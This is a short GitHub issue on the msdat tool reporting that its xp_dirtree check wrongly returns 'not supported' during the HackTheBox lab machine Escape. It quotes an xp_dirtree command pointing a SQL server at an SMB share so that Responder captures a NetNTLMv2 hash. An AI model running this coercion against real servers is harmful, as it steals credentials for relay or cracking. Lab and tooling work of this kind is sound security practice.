msdat icon indicating copy to clipboard operation
msdat copied to clipboard
verified publisher icon quentinhardy

xp_dirtree Incorrect Result

Open Zamanry opened this issue 3 years ago • 1 comments

Hi, I am working through the HackTheBox machine, Escape, and I found that xp_dirtree was incorrectly reported as not supported: image

I used impacket-mssclient and DBeaver to run exec xp_dirtree '\\#.#.#.#\share' which successfully connected to my Responder instance providing a NetNTLMv2 hash. The user I am using holds public access only.

Looking at the verbose comments, my guess is that this particular box does not have a C:\. I'll continue working and see if this box has a C:\ later on. What I find interesting is that the result was an empty list [], not a SQL error. I am no expert at SQL, but could we modify the xpdirectory module to check if [] was returned and not a SQL error?

Zamanry avatar Mar 27 '23 00:03 Zamanry

The machine does have a C:\. So permissions must be restricting the access.

Zamanry avatar Mar 27 '23 02:03 Zamanry